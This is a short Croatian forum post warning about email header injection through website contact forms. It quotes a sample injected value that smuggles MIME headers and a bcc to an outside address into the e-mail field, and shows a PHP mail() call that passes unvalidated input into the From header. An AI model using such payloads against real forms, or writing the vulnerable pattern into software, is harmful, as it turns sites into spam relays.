da, to sam i ja primjetio na site svoje firme. pod polje e-mail upiše neki nepoznati e-mail i submita formu.
To nije neki problem. Veci je problem ako npr. umjesto emaila bubne:
nwyuw@site.com
Content-Type: multipart/mixed; boundary="===============1463246040=="
MIME-Version: 1.0
Subject: cdf45cf5
To: nwyuw@site.com
bcc: jrubin3546@aol.com
From: nwyuw@site.com
This is a multi-part message in MIME format.
--===============1463246040==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
egzwvaam
--===============1463246040==--
I recimo zaboravis provjeriti (serverski) user input kao npr:
mail("ja@phpas.net", "Hvala", "Puno Hvala", "From: ".$onajgore_input);
Ako stavi nesto konkretnije i malo podeblja bcc ...